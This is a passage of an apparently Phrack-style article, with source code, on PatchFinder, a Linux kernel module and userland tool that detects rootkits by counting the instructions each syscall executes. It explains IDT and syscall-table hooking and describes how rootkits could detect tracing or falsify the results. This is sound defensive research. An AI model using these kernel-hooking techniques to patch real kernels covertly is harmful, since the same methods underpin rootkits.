+routine (defined in arch/i386/kernel/entry.S.), which is the entry for the
+0x80 exception handler.
+
+As I mentioned before the address of 'system_call' is stored in the gate
+located at position 0x80 in the the Interrupt Descriptor Table (IDT). Each
+gateway (IDT consist of 256 of them) has the following format:
+
+	struct idt_gate {
+		unsigned short  off1;
+		unsigned short  sel;
+		unsigned char   none, flags;
+		unsigned short  off2;
+	} __attribute__ ((packed));
+
+The 'sel' field holds the segment selector, and in case of Linux is equal
+to __KERNEL_CS. The handler routine is placed at (off2<<16+off1) within the
+segment, and because the segments in Linux have the base 0x0, it means that
+it is equal to the linear address. 
+
+The fields 'none' and 'flags' are used to tell the processor about some
+additional info about calling the handler. See [IA32] for detail.
+
+The idtr register, points to the beginning of IDT table (it specifies
+linear address, not logic as was in idt_gate):
+
+	struct idtr {
+		unsigned short  limit;
+		unsigned int    base;	/* linear address of IDT table */
+	} __attribute__ ((packed));
+
+Now we see, that it is trivial to find the address of system_call in our
+Linux kernel. Moreover, it is also easy to change this address to a new
+one. Of course we can not do it from userland. That is why we need a kernel
+module (see later discussion about what if we have LKM disabled), which
+changes the address of 0x80 handler and inserts the new code, which we use
+as the new system_call. And this new code may look like this: 
+
+	ENTRY(PF_system_call)		
+		pushl %ebx
+		movl $-8192, %ebx
+		andl %esp, %ebx			# %ebx <-- current
+		
+		testb $PT_PATCHFINDER,24(%ebx)	# 24 is offset of 'ptrace'
+		je continue_syscall
+		pushf
+		popl %ebx
+		orl $TF_MASK, %ebx		# set TF flag
+		pushl %ebx
+		popf
+		
+	continue_syscall:
+		popl %ebx
+		jmp *orig_system_call
+
+As you can see, I decided to use 'ptrace' field within process descriptor,
+to indicate whether a particular process wants to be single traced. After
+setting the TF flag, the original system_call handler is executed, it calls
+specific sys_xxx() function and then returns the execution to the userland
+by means of the 'iret' instruction. Until the 'iret' every single
+instruction is traced.
+
+Of course we have to also provide our #DB handler, to account all this
+instructions (this will replace the system's one):
+
+	ENTRY(PF_debug)
+		incl PF_traps 
+		iret
+		
+The PF_traps variable is placed somewhere in the kernel during module
+loading.
+
+To be complete, we also need to add a new system call, which can be called
+from the userland to set the PT_PATCHFINDER flag in current process
+descriptor's 'ptrace' variable, to reset or return the counter value.
+
+	asmlinkage int sys_patchfinder (int what) {
+		struct task_struct *tsk = current;
+
+		switch (what) {
+			case PF_START:
+				tsk->ptrace |= PT_PATCHFINDER;
+				PF_traps = 0;
+				break;
+			case PF_GET:
+				tsk->ptrace &= ~PT_PATCHFINDER;
+				break;
+			case PF_QUERY:
+				return PF_ANSWER;
+			default:
+				printk ("I don't know what to do!\n");
+				return -1;
+		}
+		return PF_traps;
+	}
+
+In this way we changed the kernel, so it can measure how many instructions
+each system call takes to execute. See module.c in attached sources for
+more details.
+
+----[ the tests
+
+Having the kernel which allows us to counter instructions in any system
+call, we face the problem what to measure. Which kernel functions should we
+check?
+
+To answer this question we should think what is the main task of every
+rootkit? Well, its job is to hide presence of attacker's
+process/files/connections in the rooted system. And those things should be
+hidden from such tools like ls, ps, netstat etc. These programs collect the
+system information through some well known system calls. 
+
+Even if backdoor does not touch syscall directly, like prrf.o, it modifies
+some kernel functions which are activated by one of the system call. The
+problem lies in the fact, that these modified functions does not have to be
+executed during every system call.  For example if we modify only some
+pointer to reading functions in procfs, then attacker's code will be
+executed only when read() is called in order to read some specific file,
+like /proc/net/tcp.
+
+It complicates detection a little, since we have to measure execution time
+of particular system call with different arguments. For example we test
+sys_read() by reading "/etc/passwd", "/dev/kmem" and "/proc/net/tcp" (i.e.
+reading regular file, device and pseudo proc-file).
+
+We do not test all system calls (about 230) because we assume that some
+routine tasks every backdoor should do, like hiding processes or files,
+will use only some little subset of syscalls.  
+
+The tests included in PatchFinder, are defined in tests.c file. The
+following one is trying to find out if somebody is hiding some processes
+and/or files in the procfs:
+
+	int test_readdir_proc () {
+		int fd, T = 0;
+		struct dirent de[1];
+
+		fd = open ("/proc", 0, 0);
+		assert (fd>0);	
+
+		patchfinder (PF_START);	
+		getdents (fd, de,  sizeof (de));
+		T = patchfinder (PF_GET);
+		
+		close (fd);
+		return T;	
+	}
+
+Of course it is trivial to add a new test if necessary. There is however,
+one problem: false positives. Linux kernel is a complex program, and most
+of the system calls have many if-then clauses which means different patch
+are executed depending on many factors. These includes caches and 'internal
+state of the system', which can be for e.g. a number of open TCP
+connections.  All of this causes that sometime you may see that more (or
+less) instructions are executed. Typically this differences are less then
+10, but in some tests (like writing to the file) it may be even 200!.
+
+This could be minimizing by increasing the number of iteration each test is
+taken. If you see that reading "proc/net/tcp" takes longer try to reset the
+TCP connections and repeat the tests. However if the differences are
+significant (i.e. more then 600 instructions) it is very probably that
+somebody has patched your kernel.
+
+But even then you must be very careful, because this differences may be
+caused by some new modules you have loaded recently, possibly unconscious. 
+
+--[ The PatchFinder
+
+Now the time has came to show the working program. A proof of concept is
+attached at the end of this article.  I call it PatchFinder. It consist of
+two parts - a module which patches the kernel so that it allows to debug
+syscalls, and a userland program which makes the tests and shows the
+results. At first you must generate a file with test results taken on the
+clear system, i.e. generated after you installed a new kernel. Then you can
+check your system any time you want, just remember to insert a
+patchfinder.o module before you make the test. After the test you should
+remove the module. Remember that it replaces the Linux's native debug
+exception handler!
+
+The results on clear system may look like this (observe the little
+differences in 'diff' column):
+
+	    test name      | current | clear | diff  | status 
+	------------------------------------------------------
+	open_file          |    1401|    1400|      1|  ok 
+	stat_file          |    1200|    1200|      0|  ok 
+	read_file          |    1825|    1824|      1|  ok 
+	open_kmem          |    1440|    1440|      0|  ok 
+	readdir_root       |    5784|    5774|     10|  ok 
+	readdir_proc       |    2296|    2295|      1|  ok 
+	read_proc_net_tcp  |   11069|   11069|      0|  ok 
+	lseek_kmem         |     191|     191|      0|  ok 
+	read_kmem          |     322|     321|      1|  ok 
+
+The tests on the same system, done when there was a adore loaded shows the
+following:
+
+	    test name      | current | clear | diff  | status 
+	------------------------------------------------------
+	open_file          |    6975|    1400|   5575| ALERT!
+	stat_file          |    6900|    1200|   5700| ALERT!
+	read_file          |    1824|    1824|      0|  ok 
+	open_kmem          |    6952|    1440|   5512| ALERT!
+	readdir_root       |    8811|    5774|   3037| ALERT!
+	readdir_proc       |   14243|    2295|  11948| ALERT!
+	read_proc_net_tcp  |   11063|   11069|     -6|  ok 
+	lseek_kmem         |     191|     191|      0|  ok 
+	read_kmem          |     321|     321|      0|  ok 
+
+Everything will be clear when you analyze adore source code :). Similar
+results can be obtained for other popular rootkits like knark or palmers'
+prrf.o (please note that the prrf.o does not change the syscall table
+directly).
+
+The funny thing happens when you try to check the kernel which was
+backdoored by SucKIT. You should see something like this: 
+
+				---== ALERT! ==--
+	It seems that module patchfinder.o is not loaded. However if you
+	are sure that it is loaded, then this situation means that
+	with your kernel is something wrong! Probably there is a rootkit
+	installed!
+
+This is caused by the fact that SucKIT copies original syscall table into
+new position, changes it in the fashion like knark or adore, and then
+alters the address of syscall table in the system_call code so that it
+points to this new copy of the syscall table. Because this copied syscall
+table does not contain a patchfinder system call (patchfinder's module is
+inserted just before the tests), the testing program is unable to speak
+with the module and thinks it is not loaded. Of course this situation easy
+betrays that something is wrong with the kernel (or that you forgot to load
+the module:)).
+
+Note, that if patchfinder.o is loaded you can not start SucKIT. This is due
+its installation method which assumes how the system_call's binary code
+should look like.  SucKIT is very surprised seeing PS_system_call instead
+of original Linux 0x80 handler...
+
+There is one more thing to explain. The testing program, before the
+beginning of the tests, sets SCHED_FIFO scheduling policy with the highest
+rt_priority. In fact, during the tests, only the patchfinder's process has
+CPU (only hardware interrupts are serviced) and is never preempted, until
+it finishes the tests. There are three reasons for such approach.
+
+TF bit is set at the beginning of the system_call, and is cleared when the
+'iret' instruction is executed at the end of the exception handler. During
+the time the TF bit is set, sys_xxx() is called, but after this some
+scheduling related stuff is also executed, which can lead to process
+switch.  This is not good, because it causes more instruction to be
+executed (in the kernel, we do not care about instructions executed in the
+switched process of course).
+
+There is also a more important issue. I observed that, when I allow process
+switching with TF bit set, it may cause processor restart(!) after a few
+hundred switches. I did not found any explanation of such behavior.  The
+following problem does not occur when SET_SCHED is set.
+
+The third reason to use realtime policy is to guarantee system state as
+stable as possible. For example if our test was run in parallel with some
+process which opens and reads lots of files (like grep), this could affect
+some tests connected with sys_open()/sys_read().
+
+The only disadvantage of such approach is that your system is inaccessible
+during the tests. However it does not take long since a typical test
+session (depending on the number of iterations per each test) takes less
+then 15 seconds to complete.
+
+And a technical detail: attached source code is using LKM to install
+described kernel extensions. At the beginning of the article I have said,
+that on some systems LKM is not compiled into the kernel. We can use only
+/dev/kmem. I also said that we can not relay on /dev/kmem since we are
+using syscalls to access it. However it should not be a problem for tool
+like patchfinder, because if rootkit will disturb in loading of our
+extensions we should see that the testing program is not working. See also
+discussion in the next section.
+
+--[ Cheating & hardening patchfinder program
+
+Now I will try to discuss a possible methods of compromising presented
+method in general and attached patchfinder program in particular. I will
+also try to show how to defend against such attacks, describing the
+properties of the next generation patchfinder...
+
+The first thing a malicious code can do is to check if it is traced. It may
+simply execute:
+
+		pushf
+		popl %ebx
+		testb $0x100, %ebx
+		jne i_am_traced
+		# contine executing
+		...
+
+	i_am_traced:
+		# deinstall for
+		# a moment
+		...
+	
+When malicious code realize that it is traced it may uninstall itself from
+the specific syscall. However, before that, it will settle in the timer
+interrupt handler, so after for e.g. 1 minute it will back to that syscall. 
+
+How to defend such trick? Well, remember that we (i.e. patchfinder) are
+tracing the code all the time. So the debug handler (which is provided by
+us) can detect that 'pushf' instruction has been just executed. Then it may
+alter the 'eflags' saved on the stack (by just executed 'pushf'), so that
+for the traced process it looks like the TF flags was cleared.
+
+I do not see at the moment any other general attack against execution trace
+analysis. However, there are possibilities of cheating a specific
+implementation, like patchfinder, which I am going to discuss now.
+
+The attacker can alter sys_write() and check if process named 'patchfinder'
+is trying to write a specific line to stdout - a line with some test
+result.  Then it will change the write()'s buffer and user will see faked
+results.  Similar, the rootkit may realized that a file with clear system
+characteristic is to be read and change the buffer returned from
+sys_read(), so the patchfinder will get false references.
+
+Moreover, when patchfinder uses a fixed number for its system call, the
+malicious rootkit can change the results returned by that system call and
+in result cheat testing process about the number of instruction executed.
+
+We can defend against such attacks, by causing that on each system
+patchfinder's executable will get different name and also by encrypting the
+file with clear system's characteristics. More over we should use different
+numbers for patchfinder's system call. The rootkit could easily trace the
+patchfinder's process by seeing that it calls specific system call.
+
+We are not limited to only to empty system calls, since we can replace any
+existing system call and first check if some magic numbers are in
+arguments. In case there is no magic arguments we simply call original
+sys_xxx().
+
+Although using random number for patchfinder's syscall we makes it a little
+bit harder for the rootkit to cheat the results returned to the patchfinder
+process, it is still possible for the malicious code to find out which
+syscall is being used. It can be achieved by pattern searching for the
+specific binary instruction.  This will be easy since attacker knows
+everything about the source code (and binary) of the patchfinder program.
+
+Another method can exploit the fact that patchfinder marks a process to be
+traced in some specific way (i.e. setting a bit in 'ptrace' field of the
+process descriptor). Malicious rootkit can replace the system_call routine
+with its own version. This new version will check if the process is marked
+by patchfinder and then it will use original syscall table. If it is not
+marked by testing process another syscall table will be used (which has
+some sys_xxx() functions replaced). It will be hard for the #DB exception
+handler to find out whether the rootkit is trying to check for e.g. the
+'ptrace' field, since the code doing this can have many forms.
+
+The debug exception handler's code can also betrays where is located the
+counter variable (PF_traps) in memory. Knowing this address, smart rootkit
+can decrease this variable at the end of its 'operational' code, by the
+number of instructions in this additional code.
+
+The only remedy I can see for the above weaknesses can be strong
+polymorphism. The idea is to add a polymorphic code generator to the
+patchfinder distribution which, for every system it is installed on, will
+create a different binary images for patchfinder's kernel code.  This
+generation could be based on some passphrase the administrator will provide
+at the installation time. 
+
+I have not yet implemented polymorphic approach, but it looks promising...
+
+--[ Another solutions
+
+The presented technique is a proposition of general approach to detect
+kernel based rootkits. The main problem in such actions is that we want to
+use kernel to help us detect malicious code which has the full control of
+our kernel. In fact we can not trust the kernel, but on the other hand want
+to get some reliable information form it.
+
+Debugging the execution path of the system calls is probably not the only
+one solution to this problem. Before I have implemented patchfinder, I had
+been working on another technique, which tries to exploit differences in
+the execution time of some system calls. The tests were actually the same
+as those which are included with patchfinder. However, I have been using
+processor 'rdtsc' instruction to calculate how many cycles a given piece of
+code has been executed. It worked well on processor up to 500Mhz.
+Unfortunately when I tried the program on 1GHz processor I noted that the
+execution time of the same code can be very different from one test to
+another. The variation was too big, causing lots of false positives. And
+the differences was not caused by the multitasking environment as you may
+think, but lays deeply in the micro-architecture of the modern processors.
+As Andy Glew explained me, these beasties have tendencies to stabilizes the
+execution time on one of the possible state, depending on the initial
+conditions. I have no idea how to cause the initial state to be the same
+for each tests or even to explore the whole space of theses initial states.
+Therefore I switched to stepping the code by the hardware debugger. However
+the method of measuring the times of syscall could be very elegant... If it
+was working. Special thanks to Marcin Szymanek for initial idea about this
+timing-based method.
+
+Although it can be (possibly) many techniques of finding rootkits in the
+kernel, it seems that the general approach should exploit polymorphism, as
+it is probably the only way to get reliable information from the
+compromised kernel.
+
+--[ Credits
+
+Thanks to software.com.pl for allowing me to test the program on different
+processors. 
+
+--[ References
+
+[HALF97] halflife, "Abuse of the Linux Kernel for Fun and Profit",
+	 Phrack 50, 1997. 
+
+[KNAR01] Cyberwinds, "Knark-2.4.3" (Knark 0.59 ported to Linux 2.4), 2001.
+
+[ADOR01] Stealth, "Adore v0.42",
+	 http://spider.scorpions.net/~stealth, 2001.
+
+[SILV98] Silvio Cesare, "Runtime kernel kmem patching",
+	 http://www.big.net.au/~silvio, 1998.
+
+[SUKT01] sd, devik, "Linux on-the-fly kernel patching without LKM"
+	 (SucKIT source code), Phrack 58, 2001.
+
+[PALM01] palmers, "Sub proc_root Quando Sumus (Advances in Kernel Hacking)"
+	 (prrf source code), Phrack 58, 2001.
+
+[MMAP02] Guillaume Pelat, "Grsecurity problem - modifying
+	 'read-only kernel'",
+	 http://securityfocus.com/archive/1/273002, 2002.
+
+[IA32]   "IA-32 Intel Architecture Software Developer's Manual", vol. 1-3,
+	 www.intel.com, 2001.
+
+--[ Appendix: PatchFinder source code
+
+This is the PatchFinder, the proof of concept of the described technique.
+It does not implement polymorphisms. The LKM support is need in order to
+run this program. If, during test you notice strange actions (like system
+Oops) this probably means that somebody rooted your system. On the other
+hand it could be my bug... And remember to remove the patchfinder's module
+after the tests.
+
+<++> ./patchfinder/Makefile
+MODULE_NAME=patchfinder.o
+PROG_NAME=patchfinder
+
+all: $(MODULE_NAME) $(PROG_NAME) 
+
+$(MODULE_NAME) : module.o traps.o
+	ld -r -o $(MODULE_NAME) module.o traps.o
+
+module.o : module.c module.h
+	gcc -c module.c -I /usr/src/linux/include 
+
+traps.o : traps.S module.h
+	gcc -D__ASSEMBLY__ -c traps.S
+
+
+$(PROG_NAME): main.o tests.o libpf.o
+	gcc -o $(PROG_NAME) main.o tests.o libpf.o
+
+main.o: main.c main.h
+	gcc -c main.c -D MODULE_NAME='"$(MODULE_NAME)"'\
+			  -D PROG_NAME='"$(PROG_NAME)"'
+tests.o: tests.c main.h
+libpf.o: libpf.c libpf.h
+
+
+clean:
+	rm -fr *.o $(PROG_NAME) 
+<--> ./patchfinder/Makefile
+<++> ./patchfinder/traps.S
+/*                                                            */
+/*            The Kernel PatchFinder version 0.9              */
+/*                                                            */
+/* (c) 2002 by Jan K. Rutkowski <jkrutkowski@elka.pw.edu.pl>  */
+/*                                                            */
+
+#include <linux/linkage.h>
+#define __KERNEL__
+#include "module.h"
+
+tsk_ptrace  = 24 			# offset into the task_struct
+
+ENTRY(PF_system_call)
+	pushl %ebx
+	movl $-8192, %ebx
+	andl %esp, %ebx			# %ebx <-- current
+	
+	testb $PT_PATCHFINDER,tsk_ptrace(%ebx)
+	je continue_syscall
+	pushf
+	popl %ebx
+	orl $TF_MASK, %ebx		# set TF flag
+ 	pushl %ebx
+	popf
+	
+continue_syscall:
+	popl %ebx
+	jmp *orig_system_call
+
+ENTRY(PF_debug)
+	incl PF_traps 
+	iret
+	
+	
+<--> ./patchfinder/traps.S
+<++> ./patchfinder/module.h
+/*                                                            */
+/*            The Kernel PatchFinder version 0.9              */
+/*                                                            */
+/* (c) 2002 by Jan K. Rutkowski <jkrutkowski@elka.pw.edu.pl>  */
+/*                                                            */
+
+#ifndef __MODULE_H
+#define __MODULE_H
+
+#define PT_PATCHFINDER	0x80	/* should not conflict with PT_xxx
+				   defined in linux/sched.h */
+
+#define TF_MASK		0x100	/* TF mask in EFLAGS */
+
+#define SYSCALL_VECTOR	0x80
+#define DEBUG_VECTOR	0x1
+
+#define PF_START	0xfee
+#define PF_GET		0xfed
+#define PF_QUERY	0xdefaced
+#define PF_ANSWER	0xaccede
+
+#define __NR_patchfinder 250
+
+
+#endif
+
+<--> ./patchfinder/module.h
+<++> ./patchfinder/module.c
+/*                                                            */
+/*            The Kernel PatchFinder version 0.9              */
+/*                                                            */
+/* (c) 2002 by Jan K. Rutkowski <jkrutkowski@elka.pw.edu.pl>  */
+/*                                                            */
+
+#define MODULE
+#define __KERNEL__
+#ifdef MODVERSIONS
+#include <linux/modversions.h>
+#endif
+
+#include <linux/kernel.h>
+#include <linux/module.h>
+#include <linux/sched.h>
+#include "module.h"
+
+#define DEBUG 1
+
+MODULE_AUTHOR("Jan Rutkowski");
+MODULE_DESCRIPTION("The PatchFinder module");
+	
+asmlinkage int PF_system_call(void);
+asmlinkage int PF_debug (void);
+int (*orig_system_call)();
+int (*orig_debug)();
+int (*orig_syscall)(unsigned int);
+extern void *sys_call_table[];
+int PF_traps;		
+
+/* this one comes from arch/i386/kernel/traps.c */
+#define _set_gate(gate_addr,type,dpl,addr) \
+do { \
+  int __d0, __d1; \
+  __asm__ __volatile__ ("movw %%dx,%%ax\n\t" \
+	"movw %4,%%dx\n\t" \
+	"movl %%eax,%0\n\t" \
+	"movl %%edx,%1" \
+	:"=m" (*((long *) (gate_addr))), \
+	 "=m" (*(1+(long *) (gate_addr))), "=&a" (__d0), "=&d" (__d1) \
+	:"i" ((short) (0x8000+(dpl<<13)+(type<<8))), \
+	 "3" ((char *) (addr)),"2" (__KERNEL_CS << 16)); \
+} while (0)
+
+struct idt_gate {
+        unsigned short  off1;
+        unsigned short  sel;
+        unsigned char   none, flags;
+        unsigned short  off2;
+} __attribute__ ((packed));
+
+struct idtr {
+        unsigned short  limit;
+        unsigned int    base;
+} __attribute__ ((packed));
+
+struct idt_gate * get_idt () {
+	struct idtr idtr;
+        asm("sidt %0" : "=m" (idtr));
+	return (struct idt_gate*) idtr.base;
+}
+
+void * get_int_handler (int n) {
+	struct idt_gate * idt_gate = (get_idt() + n);
+	return (void*)((idt_gate->off2 << 16) + idt_gate->off1);
+}
+
+static void set_system_gate(unsigned int n, void *addr) {
+	printk ("setting int for int %d -> %#x\n", n, addr);
+	_set_gate(get_idt()+n,15,3,addr);
+}
+
+asmlinkage int sys_patchfinder (int what) {
+	struct task_struct *tsk = current;
+
+	switch (what) {
+		case PF_START:
+			tsk->ptrace |= PT_PATCHFINDER;
+			PF_traps = 0;
+			break;
+		case PF_GET:
+			tsk->ptrace &= ~PT_PATCHFINDER;
+			break;
+		case PF_QUERY:
+			return PF_ANSWER;
+		default:
+			printk ("I don't know what to do!\n");
+			return -1;
+	}
+	return PF_traps;
+}
+
+int init_module () {
+		
+    	EXPORT_NO_SYMBOLS;
+
+	orig_system_call = get_int_handler (SYSCALL_VECTOR);
+	set_system_gate (SYSCALL_VECTOR, &PF_system_call);
+
+	orig_debug = get_int_handler (DEBUG_VECTOR);
+	set_system_gate (DEBUG_VECTOR, &PF_debug);
+
+	orig_syscall = sys_call_table[__NR_patchfinder];
+	sys_call_table [__NR_patchfinder] = sys_patchfinder;
+	
+	printk ("Kernel PatchFinder has been succesfully"
+		"inserted into your kernel!\n");
+#ifdef DEBUG
+	printk (" orig_system_call : %#x\n", orig_system_call);
+	printk (" PF_system_calli  : %#x\n", PF_system_call);
+	printk (" orig_debug       : %#x\n", orig_debug);
+	printk (" PF_debug         : %#x\n", PF_debug);
+	printk (" using syscall    : %d\n", __NR_patchfinder);
+
+#endif
+	return 0;
+}
+
+int cleanup_module () {
+	set_system_gate (SYSCALL_VECTOR, orig_system_call);
+	set_system_gate (DEBUG_VECTOR, orig_debug);
+	sys_call_table [__NR_patchfinder] = orig_syscall;
+	
+	printk ("PF module safely removed.\n");
+	return 0;
+}
+
+
+
+
+<--> ./patchfinder/module.c
+<++> ./patchfinder/main.h
+/*                                                            */
+/*            The Kernel PatchFinder version 0.9              */
+/*                                                            */
+/* (c) 2002 by Jan K. Rutkowski <jkrutkowski@elka.pw.edu.pl>  */
+/*                                                            */
+
+#ifndef __MAIN_H
+#define __MAIN_H
+
+#define PF_MAGIC     "patchfinder"
+#define M_GENTTBL    1	
+#define M_CHECK	     2
+#define MAX_TESTS    9	
+#define TESTNAMESZ   32 
+
+#define WARN_THRESHOLD 	 20
+#define ALERT_THRESHHOLD 500
+#define TRIES_DEFAULT	 200
+
+
+typedef struct {
+	int t;		
+	double ft;
+	char name[TESTNAMESZ];
+	int (*test_func)();
+} TTEST;
+
+typedef struct {
+	char  magic[sizeof(PF_MAGIC)];
+	TTEST test [MAX_TESTS];	
+	int   ntests;
+	int   tries;
+} TTBL;
+
+#endif
+
+
+<--> ./patchfinder/main.h
+<++> ./patchfinder/main.c
+/*                                                            */
+/*            The Kernel PatchFinder version 0.9              */
+/*                                                            */
+/* (c) 2002 by Jan K. Rutkowski <jkrutkowski@elka.pw.edu.pl>  */
+/*                                                            */
+
+
+#include <stdio.h>
+#include <unistd.h>
+#include <string.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sched.h>
+#include "main.h"
+#include "libpf.h"
+
+void die (char *str) {
+	if (errno) perror (str);
+	else printf ("%s\n", str);
+	exit (1);
+}
+
+void usage () {
+ printf ("(c) Jan K. Rutkowski, 2002\n");
+ printf ("email: jkrutkowski@elka.pw.edu.pl\n");
+ printf ("%s [OPTIONS] <filename>\n", PROG_NAME);
+			
+ printf ("  -g save current system's characteristics to file\n");
+ printf ("  -c check system against saved results\n");
+ printf ("  -t change number of iterations per each test\n");
+ exit (0);	
+
+}
+
+void write_ttbl (TTBL* ttbl, char *filename) {
+	int fd;
+	fd = open (filename, O_WRONLY | O_CREAT);
+	if (fd < 0) die ("can not create file");
+	strcpy (ttbl->magic, PF_MAGIC);
+	if (write (fd, ttbl, sizeof (TTBL)) < 0)
+			die ("can not write to file");
+	close (fd);
+}
+
+void read_ttbl (TTBL* ttbl, char *filename) {
+	int fd;
+	fd = open (filename, O_RDONLY);
+	if (fd < 0) die ("can not open file");
+	if (read (fd, ttbl, sizeof (TTBL)) != sizeof(TTBL))
+			die ("can not read file");
+	if (strncmp(ttbl->magic, PF_MAGIC, sizeof (PF_MAGIC)))
+		die ("bad file format\n");
+	close (fd);
+}
+
+main (int argc, char **argv) {
+	TTBL current, clear;	
+	int tries = 0, mode = 0;
+	int  opt, max_prio, i, j, T1, T2, dt;
+	char *ttbl_file;
+	struct sched_param sched_p;
+
+	while ((opt = getopt (argc, argv, "hg:c:t:")) != -1)
+		switch (opt) {
+			case 'g':
+				mode = M_GENTTBL;
+				ttbl_file = optarg;
+				break;
+			case 'c':
+				ttbl_file = optarg;
+				mode = M_CHECK;
+				break;
+			case 't':
+				tries = atoi (optarg);
+				break;
+			case 'h':
+			default :
+				usage();
+		}
+	
+ 	if (getuid() != 0) 
+		die ("For some reasons you have to be root");
+			
+	if (!mode) usage();
+
+	if (patchfinder (PF_QUERY) != PF_ANSWER) {
+		printf (
+			"\n			---== ALERT! ==--\n"
+			"It seems that module %s is not loaded. "
+	       		"However if you are\nsure that it is loaded,"
+		        "then this situation means that with your\n"
+       			"kernel is something wrong! Probably there is "
+		       	"a rootkit installed!\n", MODULE_NAME);
+		exit (1);
+	}		
+	
+	current.tries = (tries) ? tries : TRIES_DEFAULT;
+	if (mode == M_CHECK) {
+		read_ttbl (&clear, ttbl_file);
+		current.tries = (tries) ? tries : clear.tries;
+		
+	}
+	
+	max_prio = sched_get_priority_max (SCHED_FIFO);
+	sched_p.sched_priority = max_prio;
+	if (sched_setscheduler (0, SCHED_RR, &sched_p) < 0)
+		die ("Setting realtime policy\n");
+
+	fprintf (stderr, "* FIFO scheduling policy has been set.\n");	
+		
+	generate_ttbl (&current);
+	
+	sched_p.sched_priority = 0;
+	if (sched_setscheduler (0, SCHED_OTHER, &sched_p) < 0)
+		die ("Dropping realtime policy\n");
+	fprintf (stderr, "* dropping realtime schedulng policy.\n\n");
+
+	if (mode == M_GENTTBL) {
+		write_ttbl (&current, ttbl_file);
+		exit (0);
+	}
+
+	printf (
+	"    test name      | current | clear | diff  | status \n");
+	printf (
+	"------------------------------------------------------\n");
+
+	for (i = 0; i < current.ntests; i++) {
+		if (strncmp (current.test[i].name,
+				clear.test[i].name, TESTNAMESZ))
+			die ("ttbl entry name mismatch");
+
+		T1 = current.test[i].t;
+		T2 = clear.test[i].t;	
+		dt = T1 - T2;
+		printf ("%-18s | %7d| %7d|%7d|",
+			current.test[i].name, T1, T2, dt);
+	
+		dt = abs (dt);	
+		if (dt < WARN_THRESHOLD) printf ("  ok ");
+		if (dt >= WARN_THRESHOLD && dt < ALERT_THRESHHOLD)
+			printf ("  (?) ");
+		if (dt >= ALERT_THRESHHOLD) printf (" ALERT!");
+		
+		printf ("\n");
+	}
+
+}
+
+
+
+
+<--> ./patchfinder/main.c
+<++> ./patchfinder/tests.c
+/*                                                            */
+/*            The Kernel PatchFinder version 0.9              */
+/*                                                            */
+/* (c) 2002 by Jan K. Rutkowski <jkrutkowski@elka.pw.edu.pl>  */
+/*                                                            */
+
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <linux/types.h>
+#include <linux/dirent.h>	
+#include <linux/unistd.h>
+#include <assert.h>
+#include "libpf.h"
+#include "main.h"
+
+int test_open_file () {
+        int tmpfd, T = 0;
+
+	patchfinder (PF_START);
+	tmpfd = open ("/etc/passwd", 0, 0);
+	T = patchfinder (PF_GET);
+
+	close (tmpfd);
+	return T;	
+}
+
+int test_stat_file () {
+	int T = 0;
+	char buf[0x100];	/* we dont include sys/stat.h */
+	
+	patchfinder (PF_START);
+	stat ("/etc/passwd", &buf);
+	T = patchfinder (PF_GET);
+
+	return T;	
+}
+
+int test_read_file () {
+	int fd, T = 0;
+	char buf[0x100];
+
+	fd = open ("/etc/passwd", 0, 0);
+	if (fd < 0) die ("open");
+
+	patchfinder (PF_START);
+	read (fd, buf , sizeof(buf)); 
+	T =  patchfinder (PF_GET);
+
+	close (fd);
+	return T;	
+}
+
+int test_open_kmem () {
+	int tmpfd;
+	int T = 0;
+
+	patchfinder (PF_START);
+	tmpfd = open ("/dev/kmem", 0, 0);
+	T = patchfinder (PF_GET);
+
+	close (tmpfd);
+	return T;
+}
+
+_syscall3(int, getdents, int, fd, struct dirent*, dirp, int, count)
+int test_readdir_root () {
+	int fd, T = 0;
+	struct dirent de[1];
+
+	fd = open ("/", 0, 0);
+	if (fd < 0) die ("open");
+
+	patchfinder (PF_START);
+	getdents (fd, de,  sizeof (de));
+	T = patchfinder (PF_GET);
+
+	close (fd);
+	return T;	
+}
+
+int test_readdir_proc () {
+	int fd, T = 0;
+	struct dirent de[1];
+
+	fd = open ("/proc", 0, 0);
+	if (fd < 0) die ("open");
+
+	patchfinder (PF_START);
+	getdents (fd, de,  sizeof (de));
+	T = patchfinder (PF_GET);
+	
+	close (fd);
+	return T;	
+}
+
+int test_read_proc_net_tcp () {
+	int fd, T = 0;
+	char buf[32];
+
+	fd = open ("/proc/net/tcp", 0, 0);
+	if (fd < 0) die ("open");
+	
+	patchfinder (PF_START);
+	read (fd, buf , sizeof(buf)); 
+	T = patchfinder (PF_GET);
+
+	close (fd);
+	return T;	
+}
+
+int test_lseek_kmem () {
+	int fd, T = 0;
+
+	fd = open ("/dev/kmem", 0, 0);
+	if (fd <0) die ("open");
+
+	patchfinder (PF_START);
+	lseek (fd, 0xc0100000, 0); 
+	T = patchfinder (PF_GET);
+
+	close (fd);
+	return T;
+}
+
+int test_read_kmem () {
+	int fd, T = 0;
+	char buf[256];
+
+	fd = open ("/dev/kmem", 0, 0);
+	if (fd < 0) die ("open");
+	lseek (fd, 0xc0100000, 0);
+	
+	patchfinder (PF_START);
+	read (fd, buf , sizeof(buf)); 
+	T = patchfinder (PF_GET);
+
+	close (fd);
+	return T;	
+}
+
+int generate_ttbl (TTBL *ttbl) {
+	int i = 0, t;
+	
+#define set_test(testname) {				\
+	ttbl->test[i].test_func = test_##testname;	\
+        strcpy (ttbl->test[i].name, #testname);		\
+	ttbl->test[i].t = 0;				\
+	ttbl->test[i].ft = 0;				\
+	i++;						\
+}
+
+	set_test(open_file)
+	set_test(stat_file)
+	set_test(read_file)
+	set_test(open_kmem)
+	set_test(readdir_root)
+	set_test(readdir_proc)
+	set_test(read_proc_net_tcp)
+	set_test(lseek_kmem)
+	set_test(read_kmem)
+
+	assert (i <= MAX_TESTS);
+	ttbl->ntests = i;
+#undef set_test
+	
+	fprintf (stderr, "* each test will take %d iteration\n",
+		       	ttbl->tries);
+	usleep (100000);		
+	for (i = 0; i < ttbl->ntests; i++) {	
+		for (t = 0; t < ttbl->tries; t++)  
+			ttbl->test [i].ft +=
+			       	(double)ttbl->test[i].test_func();
+		
+		fprintf (stderr, "* testing... %d%%\r",
+			       	i*100/ttbl->ntests);
+		usleep (10000);
+	}
+
+	for (i = 0; i < ttbl->ntests; i++) 
+		ttbl->test [i].t =
+	       	(int) (ttbl->test[i].ft/(double)ttbl->tries);	
+
+	fprintf (stderr, "\r* testing... done.\n");	
+	
+	return i;
+
+}
+
+
+<--> ./patchfinder/tests.c
+<++> ./patchfinder/libpf.h
+/*                                                            */
+/*            The Kernel PatchFinder version 0.9              */
